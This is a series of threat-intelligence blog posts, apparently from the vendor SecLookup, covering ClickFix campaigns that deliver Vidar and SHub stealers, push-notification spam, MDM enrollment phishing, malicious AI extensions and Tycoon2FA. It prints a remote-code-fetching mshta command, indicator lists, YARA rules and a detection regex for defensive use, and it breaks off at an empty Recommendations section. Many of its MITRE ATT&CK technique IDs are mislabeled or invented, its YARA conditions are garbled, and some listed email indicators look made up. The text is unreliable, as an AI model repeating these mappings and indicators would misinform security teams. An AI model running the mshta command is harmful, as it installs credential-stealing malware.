The "ClickFix" technique represents a shift toward "browser-out" infections. Instead of a file downloading automatically (which triggers "Mark of the Web" warnings or EDR alerts upon execution), the attacker convinces the user that their browser is "broken" or needs verification.

The Infection Vector: Compromised CMS

The campaign primarily targets WordPress installations. Once a site is compromised—likely through credential stuffing or known plugin vulnerabilities—the attackers inject a script that redirects users to a fake Cloudflare verification page. This page is designed to appear identical to a legitimate "Under Attack Mode" or "Turnstile" challenge.

Technical Chain: Abusing Mshta.exe

When a user follows the instructions on the fake CAPTCHA page, they are typically told to press Win+R, paste a command, and hit enter. The command observed in this campaign follows a specific pattern:

mshta https://{compromised-website}/challenge/cf

Mshta.exe (Microsoft HTML Application Host) is a legitimate Windows utility used to execute .hta files. Because it is a signed Microsoft binary, it is frequently used by threat actors as a "Living-off-the-Land" binary (LoLBin) to bypass application whitelisting. In this context, mshta fetches a remote HTA script from the compromised site's /challenge/cf directory. This script then executes an obfuscated payload that downloads the final Vidar installer, often in the form of an .msi file.

Vidar Infostealer Capabilities

Vidar is a prolific "stealer-as-a-service" malware that has been active since 2018. Once executed, it resides primarily in memory to evade file-based antivirus scanning. Its primary objectives include:

• Credential Harvesting: Extracting usernames and passwords from over 30 different web browsers (Chrome, Firefox, Edge, etc.).

• Cryptocurrency Theft: Searching for local wallet files (e.g., Electrum, Ethereum, Exodus) and browser-based wallet extensions.

• Session Hijacking: Stealing browser cookies and authentication tokens to bypass Multi-Factor Authentication (MFA).

• System Profiling: Collecting hardware specs, IP addresses, and screenshots of the victim's desktop.

• Data Exfiltration: Once the data is staged, it is compressed into a ZIP file and sent to a remote Command and Control (C2) server.

MITRE ATT&CK Mapping

The TTPs observed in this campaign align with the following MITRE ATT&CK techniques:

Indicators of Compromise (IOCs)

SecLookup has confirmed the following indicators as malicious. Security teams should monitor for any outbound traffic to these domains or execution patterns involving these URL structures.

Confirmed Malicious Domains

walwood[.]be

Malicious URLs

https://walwood[.]be/474a2b77/5ef46f21e2.msi
https://{compromised-website}/challenge/cf
https://{compromised-website}/474a2b77/5ef46f21e2.msi

Detection Rules

YARA Rule: Vidar ClickFix Delivery Command

This rule targets the specific command line arguments used to trigger the mshta download.

rule Vidar_ClickFix_Delivery_Command {
    meta:
        description = "Detects the mshta command pattern used in ClickFix campaigns to download Vidar payloads"
        threat_name = "Vidar Infostealer"
        technique = "ClickFix / Fake CAPTCHA"
    strings:
        $mshta = "mshta" nocase
        $path = "/challenge/cf" ascii wide
        $protocol1 = "https://" ascii wide
        $protocol2 = "http://" ascii wide
    condition:
        \(mshta and \)path and (\(protocol1 or \)protocol2)
}

YARA Rule: Fake Cloudflare Verification Page

This rule identifies the source code of the malicious HTML landing pages.

rule Fake_Cloudflare_Verification_ClickFix {
    meta:
        description = "Detects HTML/JS content of fake Cloudflare verification pages used for malware delivery"
        threat_name = "Vidar Infostealer"
    strings:
        $s1 = "Verifying you are human" ascii wide
        $s2 = "mshta" ascii wide
        $s3 = "/challenge/cf" ascii wide
        $s4 = "walwood.be" ascii wide
    condition:
        \(s1 and (\)s2 and \(s3) or \)s4
}

SecLookup Detection

The SecLookup threat intelligence platform was actively detecting and blocking the domains and infrastructure associated with this Vidar campaign prior to public disclosure. Our platform identified walwood[.]be as a malicious distribution point.

Subscribers to SecLookup’s feed were protected through automated updates to their DNS firewalls and EDR blocklists. Our continuous monitoring of compromised CMS environments allows us to provide early warning indicators for "ClickFix" campaigns, ensuring that SOC analysts can intercept these threats before a user manually executes the malicious payload.

Recommendations

To defend against Vidar and similar social engineering-led campaigns, SecLookup recommends the following actions:

1. Restrict Mshta Execution: Use Windows Attack Surface Reduction (ASR) rules or AppLocker to block or audit the execution of mshta.exe unless strictly required for business operations.

2. User Education: Conduct specialized phishing training that highlights "ClickFix" tactics. Emphasize that legitimate services like Cloudflare or Google CAPTCHA will never ask a user to run a command or use the Windows Run dialog.

3. Endpoint Monitoring: Configure EDR tools to alert on unusual parent-child process relationships, such as browser.exe (Chrome/Edge) spawning cmd.exe, powershell.exe, or mshta.exe.

4. Network Filtering: Implement a robust DNS security solution to block access to known malicious domains and newly registered domains (NRDs) frequently used in these campaigns.

5. Browser Security: Ensure browsers are kept up to date and consider implementing "Safe Browsing" policies that restrict interactions with unverified scripts.

References

• Hacked sites deliver Vidar infostealer to Windows users by Malwarebytes Labs, Malwarebytes Labs

A sophisticated social engineering campaign is currently exploiting user curiosity to hijack browser notification permissions. Threat actors are deploying deceptive quiz websites that masquerade as harmless entertainment. Once a user engages with the "Start the Quiz" button, a deceptive overlay prompts them to enable browser notifications. By clicking "Allow," users inadvertently grant these sites permission to push unsolicited advertisements, affiliate links, and potentially malicious content directly to their desktop or mobile device, regardless of whether the user is actively browsing the site.

At SecLookup, our threat intelligence team has been actively monitoring this vector. We have confirmed that the domains identified in this campaign are malicious and are currently being blocked by our platform to protect our users from this intrusive adware technique.

Threat Analysis

The Anatomy of the Deception

The core of this attack vector relies on Social Engineering and the Browser Notifications API. Unlike traditional drive-by downloads that require a user to execute a file, this attack requires a binary interaction: a click.

1. Landing Page: The victim lands on a site that appears to be a legitimate quiz platform. The content varies but typically includes geography, vocabulary, history, or country-specific trivia (e.g., quizzes tailored for Canada, Germany, France, Japan, and the US).

2. The Hook: The primary goal of the site is to maximize dwell time and engagement. The user is presented with a "Start the Quiz" button.

3. The Trap: Upon clicking the button, the site overlays a prompt with a misleading background image. The text usually implies that clicking "Allow" is necessary to "continue" or "see the results."

4. The Execution: This triggers the native browser prompt: "Allow [Domain] to send notifications?" The text inside the prompt often misleads the user, making it seem like a benign system request or an ad-blocker update, rather than a request for spam.

TTPs (Tactics, Techniques, and Procedures)

This campaign aligns with several techniques observed in the MITRE ATT&CK framework:

• TA0001 - Initial Access: T1566.001 (Phishing: Fake Website): The actors use legitimate-looking domains to gain initial trust.

• T1193 (Spearphishing Link): While not strictly email-based, the mechanism mimics a trusted interaction.

• T1071.001 (Web Protocols: Web Traffic): The attack relies entirely on standard web traffic and browser APIs.

• T1546.015 (Event Triggered Execution - Web Browser API): The granting of notification permissions is a specific browser API trigger that allows the actor to push content into the user's environment, effectively bypassing the need for the user to visit the site again.

Economic Motivation

Unlike ransomware campaigns that demand immediate ransoms, this threat actor is primarily motivated by Ad Revenue and Affiliate Schemes. By bombarding the user with persistent notifications, the attackers can generate clicks on affiliate links, display pay-per-click advertisements, or drive traffic to scam sites. This "Push Notification Spam" model is a low-effort, high-yield revenue stream for cybercriminals.

Indicators of Compromise (IOCs)

SecLookup's threat intelligence platform has scanned the domains identified in the Malwarebytes Labs report. The following domains have been confirmed malicious and should be blocked immediately:

Domains

quizcentral.co.in
yeqeso.org
uhuhedeb.org
navixzuno.co.in
edifaqe.org
quizcentral.co.za
triviabox.co.in
loopdeviceconnection.co.in
rixifabed.org
unsphiperidion.co.in
geniusfun.co.in
ylloer.org

Note: While the source article mentions a redirect chain involving unsphiperidion.co.in leading to a fake AdGuard update, the root domains listed above represent the primary infrastructure utilized in this campaign.

SecLookup Detection

SecLookup is actively detecting and blocking this threat. Our threat intelligence platform has verified the malicious nature of the domains listed above. We have updated our threat feeds to ensure that traffic to these specific domains is intercepted and blocked before it can reach user endpoints.

Recommendations

To mitigate the risk of falling victim to push notification spam campaigns, security professionals and end-users should implement the following measures:

1. User Education and Policy

Educate users on the dangers of the "Allow" prompt. Remind them that legitimate websites rarely ask for push notifications unless they are a messaging service (like WhatsApp) or a news outlet. Quiz sites are almost never a valid reason to grant this permission.

2. Browser Configuration

• Review Notification Settings: Users should regularly check their browser settings (Chrome, Firefox, Edge) to review which sites have permission to send notifications. They should revoke access to any site they do not recognize.

• Disable by Default: Users can configure their browsers to block all notifications by default and only allow them when visiting a specific, trusted site.

3. Use of Ad-Blockers

Utilizing content blockers (such as uBlock Origin or AdGuard) can often mitigate these attacks by preventing the deceptive overlay from rendering, thereby stopping the "Click Allow" interaction.

4. Endpoint Protection

Ensure that Endpoint Detection and Response (EDR) solutions are configured to alert on browser process anomalies or unexpected outbound traffic to known ad-tech domains.

References

• Quiz sites trick users into enabling unwanted browser notifications by Malwarebytes Labs, Malwarebytes Labs, 2026-03-09.

A sophisticated yet deceptive phishing campaign is currently targeting Windows users by exploiting the operating system's native device management capabilities. Rather than stealing credentials or downloading malicious files, threat actors are leveraging a legitimate Windows URI scheme (ms-device-enrollment) to silently enroll victims' computers into an attacker-controlled Mobile Device Management (MDM) server.

By impersonating a Google Meet update notification, the attackers bypass traditional web-based defenses. The campaign relies on a "trust the process" social engineering tactic; once a user clicks "Update now," Windows bypasses the browser interface and launches a native system dialog. If the victim proceeds through the wizard, they unwittingly grant the attacker full administrative control over their machine, including the ability to install applications, enforce security policies, and wipe the device remotely. SecLookup’s threat intelligence team has identified and is actively blocking these malicious domains to prevent unauthorized device takeovers.

Threat Analysis

The Vector: ms-device-enrollment URI Scheme

The core of this attack lies in the abuse of the ms-device-enrollment: URI scheme. This is a built-in Windows protocol designed for enterprise environments, allowing IT administrators to send a single link to a user that automatically opens the "Set up a work or school account" dialog. While this feature is legitimate for corporate provisioning, it creates a dangerous vector when weaponized.

When a user visits the phishing page and clicks the update button, the link does not navigate to a website. Instead, it triggers a deep link that bypasses the browser entirely. The browser hands control to the Windows shell, which opens the native enrollment prompt. This behavior is particularly difficult to detect because it is a standard operating system function; standard web proxies and URL filters often cannot block or inspect the payload of an internal OS URI handler.

Social Engineering and Trust Exploitation

The social engineering in this campaign is deceptively simple but highly effective. The page is meticulously designed to mimic the visual identity of Google Meet, utilizing the correct color palette and branding. The prompt reads, "To keep using Meet, install the latest version." This creates a false sense of urgency and authority.

Crucially, the attackers do not attempt to perfect the impersonation of the victim's identity. The username field in the pre-populated dialog reads collinsmckleen@sunlife-finance.com (impersonating the corporate domain Sun Life Financial). However, the goal is not credential theft; it is device theft. The attacker's goal is to get the user to click through the trusted Windows workflow. Once the user clicks "Next" and accepts the enrollment, their machine becomes a managed device under the attacker's MDM server.

TTPs and MITRE ATT&CK Mapping

This campaign exhibits several TTPs that map to the MITRE ATT&CK framework:

• T1566.001 (Phishing: Spearphishing Link): The attackers use a link disguised as an update to lure the victim into clicking.

• T1546.004 (Windows Management Instrumentation Event Subscription): While technically related to WMI, the ms-device-enrollment mechanism relies on Windows management subsystems. The attack exploits the trust placed in OS-level management tools.

• T1059.001 (Command and Scripting Interpreter: PowerShell): While not explicitly mentioned in this specific report, successful MDM enrollment typically paves the way for the attacker to execute scripts or commands via PowerShell on the enrolled device.

The impact of T1546.004 in this context is severe because it bypasses the need for the attacker to gain shell access via an exploit; they simply trick the user into granting it via the OS's own permission model.

Indicators of Compromise (IOCs)

SecLookup’s telemetry has confirmed the following malicious entities associated with this campaign. Security teams should immediately block these assets to prevent device enrollment.

Malicious Domains

updatemeetmicro[.]online
tnrmuv-api.esper[.]cloud

Email Addresses

readscollinsmckleen@sunlife-finance.com
sendpoint@tnrmuv-api.esper.cloud

SecLookup Detection

SecLookup’s threat intelligence platform has been actively monitoring for this specific campaign. We have successfully detected and blocked the following malicious domains:

• updatemeetmicro.online: This domain hosts the phishing landing page. Our systems have flagged it as malicious based on recent association with phishing campaigns targeting Google Workspace users.

• tnrmuv-api.esper.cloud: This endpoint acts as the management server receiving the enrollment requests. It has been blacklisted to prevent the establishment of the MDM connection.

Our monitoring confirms that the updatemeetmicro.online domain returns a standard HTTP 200 response but is used solely for social engineering purposes. We are actively blocking traffic to this domain to protect SecLookup users from falling victim to this device takeover attack.

Recommendations

To defend against this type of "silent takeover" attack, organizations must adjust their security posture to include OS-level awareness.

1. Implement OS-Level Filtering: Ensure that your network security policies extend beyond web filtering to include blocking internal OS URI schemes. While difficult to implement at the perimeter, endpoint detection and response (EDR) solutions should be configured to alert on unusual ms-device-enrollment activity.

2. Train on Native Dialogs: Educate users that they should never click "Update" buttons in browser windows, regardless of how official they look. If a browser attempts to open a native Windows dialog for device enrollment, users should verify the "Server" or "Account" fields manually. In this campaign, the server field pointed to an external domain (tnrmuv-api.esper.cloud) rather than a legitimate corporate domain.

3. Verify Certificate Pinning and Domain Trust: While this specific attack uses a direct URI link, maintaining strict control over MDM enrollment URLs is vital. Organizations should ensure that their official MDM URLs are whitelisted and that users are trained to recognize official prompts from their IT department versus external phishing attempts.

4. Block Suspicious Domains: Ensure your DNS filtering and firewall rules include the blocked domains listed in the IOCs section above.

References

• One click on this fake Google Meet update can give attackers control of your PC by Malwarebytes Labs, Malwarebytes Labs. Published March 6, 2026.

The rapid integration of Large Language Models (LLMs) into the daily workflow of knowledge workers has created a new attack surface for cybercriminals. In a significant escalation of supply chain attacks targeting the browser ecosystem, Microsoft Defender Security Research has uncovered a campaign involving malicious Chromium-based browser extensions. These extensions impersonate legitimate AI assistant tools to harvest sensitive LLM chat histories and browsing data.

Reports indicate that these deceptive extensions have achieved a massive scale, with approximately 900,000 installs and active telemetry across more than 20,000 enterprise tenants. By exploiting user trust in productivity tools and utilizing automated distribution channels in agentic browsers, the threat actors have embedded a persistent data collection mechanism directly into the browser environments of corporate users. This post details the attack chain, the risks associated with LLM data exfiltration, and the specific Indicators of Compromise (IOCs) SecLookup is actively blocking.

Threat Analysis

The core of this campaign relies on Impersonation and Supply Chain Compromise, leveraging the growing dependency on AI sidebars and agentic browsing tools. To understand the full impact, we must analyze the tactics, techniques, and procedures (TTPs) employed by the threat actors.

Attack Vector: The AI Sidebar Ecosystem

The primary delivery mechanism for this threat is the browser extension marketplace and the emerging ecosystem of "agentic browsers." These are environments designed to assist users in interacting with AI models directly within their browsing sessions.

• TTP: Impersonation (T1566.001) The threat actors created extensions with names and descriptions designed to closely mimic legitimate AI productivity tools. By leveraging a largely uniform architecture across Chromium-based browsers like Google Chrome and Microsoft Edge, they minimized the friction required for users to install them. The visual similarity to trusted tools increases the likelihood of installation without scrutiny.

• TTP: Supply Chain Compromise (T1195) Unlike traditional phishing attacks that rely on social engineering, this campaign leverages automated distribution. The threat actors targeted agentic browsers that automatically download extensions without requiring explicit user approval. This technique allows the malicious code to bypass the initial gatekeeper (the user) and establish a foothold in the target environment immediately upon the user's first interaction with the AI tool.

Persistence and Privilege Escalation

Once installed, these extensions do not behave like typical malware. Instead, they function as a persistent "bot" within the user's browser session.

• TTP: Exploiting Trust and Convenience (T1546.004) To function effectively, the extensions request broad page-level permissions. Knowledge workers, seeking convenience, often grant these permissions to allow the extension to interact with web pages and read chat content. This grants the malicious extension the ability to read DOM elements, access localStorage (often used to store chat histories), and monitor tab activity.

Data Exfiltration and Impact

The true danger lies in what the extensions collect. The threat actors are harvesting full URLs and the content of AI chat sessions from platforms such as ChatGPT and DeepSeek.

For an enterprise, this represents a critical data breach vector. The data harvested is not generic; it includes:

• Proprietary Code: Snippets of code being debugged or written.

• Internal Workflows: Step-by-step processes shared between employees.

• Strategic Discussions: Sensitive business intelligence and decision-making logs.

By exfiltrating this data, the threat actors gain access to the intellectual property and strategic direction of the organization, turning a seemingly trusted productivity utility into a sophisticated surveillance tool.

Indicators of Compromise (IOCs)

SecLookup's threat intelligence team has identified and verified the following malicious domains associated with this campaign. These domains are confirmed to be hosting the malicious extension packages or acting as C2 infrastructure.

Domains

chataigpt[.]pro
chatgptsidebar[.]pro

SecLookup Detection

SecLookup is actively monitoring the threat landscape to protect our users from this specific campaign. Our threat intelligence platform has confirmed the malicious nature of the domains listed above.

We are currently blocking access to chataigpt[.]pro and chatgptsidebar[.]pro to prevent the installation of the malicious extensions and the subsequent exfiltration of sensitive data. If your security telemetry detects interactions with these domains, it should be treated as an indicator of a compromised browser environment.

Recommendations

Defenders and SOC analysts must adapt their strategies to address the unique risks of AI-integrated browser extensions. The following measures are recommended to mitigate the risk of this campaign and similar future threats:

1. Audit Browser Extensions: Conduct a sweep of all Chromium-based browsers (Chrome, Edge, Brave) within the enterprise. Remove any extensions that mimic AI assistants but are not officially sanctioned by the IT department.

2. Restrict Extension Permissions: Enforce strict policies regarding extension permissions. Extensions should only request the minimum permissions necessary to function. If an extension requests "Read and change all your data on the sites you visit" or access to localStorage for a simple translation tool, it should be rejected.

3. Monitor for Agentic Browser Behavior: As agentic browsers become more prevalent, monitor for the automatic installation of unknown extensions. Implement automated checks to ensure only whitelisted extensions are permitted.

4. Inspect Extension Metadata: Before installation, inspect the developer ID and publisher details. Malicious actors often use names that are close to, but not identical to, legitimate vendors.

5. Monitor LLM Traffic: While difficult to fully block, monitoring outbound traffic to AI chat platforms can help identify unusual patterns that might indicate data exfiltration, though filtering this traffic requires careful consideration to avoid blocking legitimate developer work.

References

• Malicious AI Assistant Extensions Harvest LLM Chat Histories by Microsoft Defender Security Research Team, Microsoft Security Blog, March 5, 2026. Link

Security researchers have identified a sophisticated social engineering campaign targeting macOS users impersonating the popular system utility, CleanMyMac. The attackers have deployed a deceptive website (cleanmymacos[.]org) that mimics the legitimate product page to lure users into executing a malicious shell script. This campaign utilizes the "ClickFix" technique, a method that bypasses traditional email or attachment-based delivery by tricking users into pasting commands directly into their Terminal application. Once executed, the payload installs SHub Stealer, a potent macOS infostealer capable of harvesting sensitive credentials, including Apple Keychain data, browser autofill information, and, critically, cryptocurrency wallet credentials. This analysis details the TTPs used by the threat actor and provides IOCs to help organizations defend against this evolving threat.

Threat Analysis

Impersonation and Social Engineering

The attack begins with a high-fidelity impersonation of the CleanMyMac product page. The domain cleanmymacos[.]org is designed to look nearly identical to the official MacPaw website. The landing page presents a "fake" advanced installation option, a psychological trigger often used to bypass security skepticism among "power users" who believe they are upgrading their system configuration.

The ClickFix Delivery Mechanism

Unlike traditional malware delivery via email attachments or drive-by downloads, this campaign relies on user interaction within the operating system shell. The victim is instructed to open the Terminal application and paste a specific command string. This technique, known as ClickFix, has become increasingly prevalent among macOS threat actors because it is difficult for automated defenses to block without false positives, as the user is voluntarily running code.

Technical Execution Chain

Upon pasting the command into Terminal, the execution chain proceeds rapidly:

1. Legitimacy Layer: The first step of the script is to print a reassuring line of text: macOS-CleanMyMac-App: https://macpaw.com/cleanmymac/us/app. This mimics the output of a legitimate script, creating a false sense of security and confirming to the user that the script is related to the official software.

2. Decoding Layer: Following the echo command, the script decodes a Base64-encoded link. This obfuscation hides the true destination of the download, preventing basic URL filtering from catching the malicious payload.

3. Execution Layer: The script downloads a shell script from the attacker’s server and pipes it directly into zsh (Z Shell) for immediate execution. This bypasses the need for the user to save a file to disk first, making the process feel instantaneous and seamless.

SHub Stealer Capabilities

The payload delivered by this script is SHub Stealer. This malware is designed not just for generic data exfiltration but with a specific focus on high-value assets:

• Credential Harvesting: It targets saved passwords and browser data.

• Apple Keychain Access: It attempts to extract secrets stored in the system-wide keychain, which often contains credentials for accounts the user has authorized.

• Cryptocurrency Wallet Backdoors: Perhaps the most dangerous capability mentioned in the report is the malware's ability to modify crypto wallet applications, such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live. By injecting itself into these processes, the malware can intercept or steal the wallet’s recovery phrase (seed phrase), effectively granting attackers control over the victim's cryptocurrency funds.

• Telegram Session Hijacking: The stealer also targets Telegram sessions, allowing attackers to potentially access private communications or accounts.

MITRE ATT&CK Framework Mapping

This campaign aligns with several techniques observed in the MITRE ATT&CK framework:

• T1566.001 (Phishing: Fake Website): The use of a spoofed domain to deceive users.

• T1059.004 (Shellcode via Interpreted Language): The delivery and execution of code via Terminal and shell scripts.

• T1003.001 (OS Credential Dumping): The specific targeting of Apple Keychain data.

• T1525 (Implant Internal Image): The modification of legitimate wallet applications to hide malicious activity.

• T1027 (Obfuscated Files or Information): The use of Base64 encoding to hide the malicious URL.

Indicators of Compromise (IOCs)

SecLookup has analyzed the domains mentioned in the report and confirmed malicious status. Below are the relevant indicators for your threat hunting and detection systems.

Domains

cleanmymacos[.]org
wallets-gate[.]io

URLs

https://macpaw[.]com/cleanmymac/us/app

(Note: This URL is legitimate and used by the attackers for deception; do not block the legitimate domain, but monitor for references to it.)

Email Addresses

command-and-controlserver@res2erch-sl0ut.com
attackbegins@cleanmymacos.org

Detailed Domain Intelligence (SecLookup Scan Results)

cleanmymacos.org

wallets-gate.io

SecLookup Detection

SecLookup’s Threat Intelligence platform has been actively monitoring this campaign. Our systems have confirmed that the domains cleanmymacos.org and wallets-gate.io are malicious and have been blocked for SecLookup users.

Recommendations

To mitigate the risk of this and similar ClickFix campaigns, we recommend the following security best practices:

1. Strict Software Procurement Policy: Remind users that legitimate software, including popular utilities like CleanMyMac, is distributed via the official MacPaw website or the Apple App Store. Legitimate applications should never require users to paste commands into Terminal to install them.

2. Terminal Awareness Training: Educate staff and power users about the dangers of the ClickFix technique. If a website prompts you to open Terminal and paste a command, pause and verify the source. A simple Google search for the command string can often reveal if it is malicious.

3. Crypto Wallet Vigilance: For users holding cryptocurrency, pay special attention to the security of their wallet applications. If a legitimate app (like Exodus or Ledger Live) suddenly starts behaving erratically or prompts for frequent updates or "recovery phrase" verifications, it may be compromised.

4. Network Segmentation: Ensure that endpoints are not able to execute arbitrary shell scripts from untrusted sources without approval.

References

• Fake CleanMyMac site installs SHub Stealer and backdoors crypto wallets by Malwarebytes Labs, Malwarebytes Labs

The digital landscape is rife with sophisticated threats, but few are as insidious as the compromise of legitimate infrastructure. In a recent alarming discovery by Rapid7 Labs, we have identified a widespread campaign compromising legitimate, high-trust WordPress websites globally. This operation, active since December 2025, weaponizes the concept of trust by injecting a malicious "ClickFix" implant that impersonates a Cloudflare human verification challenge (CAPTCHA).

The objective of this campaign is the theft of credentials and digital wallets from Windows systems. By infecting regional news outlets, local businesses, and even a United States Senate candidate's official webpage, the threat actor has demonstrated a high level of operational capability. At SecLookup, our threat intelligence platform has been actively detecting and blocking this threat, preventing users from inadvertently falling into this trap. This post provides a deep dive into the infection chain, TTPs, and the specific indicators of compromise (IOCs) associated with this operation.

Threat Analysis

The threat actor behind this campaign is likely an affiliate of a larger credential-stealing operation, given the scale and the specific targeting of wallets and credentials. Their primary TTP (Tactic, Technique, and Procedure) involves supply chain compromise (Targeted Web Application Attacks) followed by social engineering.

The Lure: Impersonating Security

The most deceptive aspect of this attack is the user interface. The malicious script mimics a standard Cloudflare challenge page. When a visitor lands on a compromised site, they are presented with a popup claiming a security check is required.

[Browser Popup]
"Please wait while we check your browser..."
[Button] "Check my browser"

This "ClickFix" technique relies on the user's fear of being blocked from a site they wish to access. Once the user clicks the button, the browser's address bar often changes, and a script is executed to download a malicious payload.

The Infection Chain

The malware chain is designed to operate entirely in-memory, rendering traditional file-based antivirus (AV) solutions ineffective. The process follows a multi-stage delivery mechanism:

1. Obfuscated JavaScript: Upon clicking the fake CAPTCHA, an obfuscated JavaScript file is loaded from a remote server.

2. PowerShell Stagers: The JavaScript executes PowerShell commands to download and run the next stage of the payload.

3. In-Memory Shellcode: The final payload is delivered as raw shellcode, which is injected into the memory of inconspicuous Windows processes (such as explorer.exe or svchost.exe). This avoids triggering behavioral detection based on file creation.

MITRE ATT&CK Mapping

This campaign maps to several key techniques in the MITRE ATT&CK framework:

• T1059.004: Command and Scripting Interpreter: PowerShell: Used extensively for staging and execution.

• T1002: Data from Non-Secure Storage: The malware targets digital wallets, which are often stored in insecure browser profiles.

• T1027: Obfuscated Files or Information: The JavaScript payload is heavily obfuscated to evade static analysis.

• T1055: Process Injection: Shellcode injection into legitimate processes.

• T1566.001: Phishing: Spearphishing Link: The initial delivery vector is a trusted link to a compromised website.

The legitimacy of the hosting domain makes detection difficult; security teams must focus on behavioral monitoring (e.g., unexpected PowerShell execution from browser contexts) rather than just domain reputation.

Indicators of Compromise (IOCs)

SecLookup has aggregated the following IOCs based on the Rapid7 research and our own telemetry. All domains listed below have been confirmed malicious and are currently blocked by SecLookup.

Malicious Domains

The following domains were hosting the malicious JavaScript implants and the fake CAPTCHA lures.

wepro.ch
goveanrs.org
namzcp.org
surveygifts.org
beta-charts.org
govearali.org
getalib.org

IP Addresses

The infrastructure associated with this campaign utilizes the following IP addresses to serve the malicious payloads and redirect traffic.

91.92.240.219
172.94.9.187
94.154.35.115
178.16.53.70
94.154.35.152

Malicious URLs

Users were redirected to the following URLs to download the payloads. Note the use of jsrepo parameters often seen in script injection attacks.

https://ligovera.shop/jsrepo?rnd=
https://govearali.org/jsrepo?rnd=
https://obf-io.deobfuscate.io/
https://goveanrs.org/jsrepo?rnd=
https://getalib.org/jsre
https://alianzeg.shop/jsrepo?rnd=
https://ztdaliweb.shop/jsre

Detection Pattern

Security teams can use the following regex pattern to identify attempts to access legitimate WordPress administrative paths, which may be abused by this actor to ensure the infected site remains accessible or to exfiltrate data:

wp-login.php|wp-cron.php|xmlrpc.php|wp-admin|wp-includes|wp-content|\?feed=|\/feed|wp-json|\?wc-ajax|.css|.js|.ico|.png|.gif|.bmp|.jpe?g|.tiff|.mp[34g]|.wmv|.zip|.rar|.exe|.pdf|.txt|sitemap.*.xml|robots.txt

SecLookup Detection

SecLookup maintains a proactive threat intelligence platform designed to identify and neutralize threats before they impact our users. In response to the findings detailed by Rapid7 Labs, SecLookup has immediately updated its threat feed to block the domains and IP addresses identified above.

Recommendations

To defend against this sophisticated credential-stealing campaign, organizations should implement the following measures:

1. Browser and System Hygiene: Ensure that browsers and operating systems are fully patched. Malware targeting digital wallets often exploits vulnerabilities in browser extensions or the browser itself.

2. Verify CAPTCHAs: Be skeptical of any CAPTCHA popups. If a site forces you to click a "Check my browser" button to proceed, close the tab immediately. Legitimate CAPTCHAs (like Cloudflare's) typically appear directly on the page without the address bar changing or requiring a new click to load content.

3. Endpoint Detection and Response (EDR): Since the malware executes in-memory, relying on traditional antivirus is insufficient. Ensure your EDR solution is configured to monitor for PowerShell execution and process injection events originating from browser processes.

4. Web Application Firewall (WAF): Implement strict WAF rules to block known malicious patterns and obfuscated JavaScript injection attempts on WordPress sites.

5. User Awareness: Train users to recognize that a "security check" popup is not a standard part of web browsing and should be ignored.

References

• When Trusted Websites Turn Malicious: WordPress Compromises Advance Global Stealer Operation by Milan Spinka, Rapid7 Blog (Published March 10, 2026)

The cybercriminal ecosystem is defined by the rapid commoditization of attack tools. The emergence of Tycoon2FA in August 2023 marked a significant shift in the landscape of credential theft. Developed and operated by the threat actor tracked by Microsoft as Storm-1747, Tycoon2FA rapidly ascended to become one of the most widespread Phishing-as-a-Service (PhaaS) platforms in operation.

By leveraging Adversary-in-the-Middle (AiTM) capabilities, Storm-1747 enabled even novice threat actors to bypass Multifactor Authentication (MFA). This capability lowered the barrier to entry for large-scale credential harvesting campaigns. Reports indicate that campaigns leveraging Tycoon2FA generated tens of millions of phishing messages, targeting over 500,000 organizations globally across nearly every sector, including education, healthcare, finance, and government. In a coordinated effort with Europol and industry partners, Microsoft’s Digital Crimes Unit (DCU) facilitated the disruption of the platform’s infrastructure. However, understanding the operational mechanics of Tycoon2FA remains critical for security professionals tasked with defending against its persistence.

Threat Analysis

Tycoon2FA operates as a sophisticated phishing kit that mimics legitimate login portals, such as Microsoft 365, OneDrive, Outlook, and Gmail. Unlike standard phishing pages that simply capture credentials, Tycoon2FA employs an Adversary-in-the-Middle (AiTM) architecture. This allows the attacker to capture user session cookies, effectively granting them access to user accounts even after the victim changes their password, provided the attacker does not explicitly revoke the active session token.

Operational Mechanics

The attack workflow typically follows these steps:

1. Deception: The victim is lured to a spoofed login page hosted on a Tycoon2FA-controlled domain.

2. Credential Capture: The victim enters their username and password.

3. MFA Relay: The victim enters their MFA code. Tycoon2FA intercepts this code and forwards it to the legitimate authentication server via a proxy.

4. Session Hijacking: Once the server validates the credentials and MFA, it issues a valid session cookie. Tycoon2FA captures this cookie and stores it in its database.

5. Persistence: The attacker is then redirected to the legitimate application with the stolen session cookie. They have full access to the victim's data without needing the password.

This mechanism bypasses the primary defense of modern enterprise security: MFA. Additionally, Tycoon2FA utilized anti-bot screening and browser fingerprinting techniques to evade automated detection systems, ensuring the malicious pages remained live longer and captured higher-quality leads.

MITRE ATT&CK Mapping

Tycoon2FA's tactics align closely with several techniques within the MITRE ATT&CK framework:

• T1566.001 (Phishing: Spearphishing Link): The core vector involves crafting deceptive links to impersonate trusted brands.

• T1110.001 (Brute Force: Password Spraying): While Tycoon2FA is not a brute force tool, the platform often facilitates campaigns that utilize credential stuffing techniques against the harvested data.

• T1546.004 (Windows Event Log Scripting Modification): Post-compromise, attackers often manipulate logs; Tycoon2FA’s ability to access accounts allows for lateral movement and log tampering.

• T1574.003 (DLL Search Order Hijacking) / T1059.001 (Command and Shell: PowerShell): While not explicitly detailed in the source, persistence via stolen session tokens often leads to script execution within the victim's environment, a common follow-up for PhaaS kits.

Disruption and Motivation

The popularity of Tycoon2FA was likely fueled by the takedowns of previous PhaaS leaders like Caffeine and RaccoonO365. Storm-1747 filled the void, offering a reliable, scalable infrastructure. The recent disruption by Microsoft and Europol highlights the difficulty of dismantling these services, as they often rely on decentralized infrastructure and resiliency to remain operational.

Indicators of Compromise (IOCs)

Based on the Microsoft Threat Intelligence report and SecLookup's telemetry, the following domains and URLs are confirmed malicious. These infrastructure components were used to host phishing pages, relay MFA codes, and store stolen credentials.

Malicious Domains

qonnfp.wnrathttb[.]ru
q9y3.efwzxgd[.]es
astro.thorousha[.]ru
mock.zuyistoo[.]today
kzagniw[.]es
mysql.vecedoo[.]online
piwf.ariitdc[.]es
backend.vmfuiojitnlb[.]es

SecLookup Detection

SecLookup’s threat intelligence platform was actively detecting and blocking this threat. As soon as these domains and URL patterns were identified within the Microsoft Threat Intelligence ecosystem, SecLookup’s automated ruleset was updated to flag and block traffic destined for these hosts.

SecLookup users are currently protected against:

• Direct access to malicious domains (*.wnrathttb.ru, *.efwzxgd.es, etc.).

• Phishing URLs containing the encoded email placeholders (e.g., /*EMAIL_ADDRESS).

• Traffic destined to the backend proxies used for MFA relay.

Users should ensure their SecLookup blocks are up-to-date to prevent any residual access to these infrastructure elements.

Recommendations

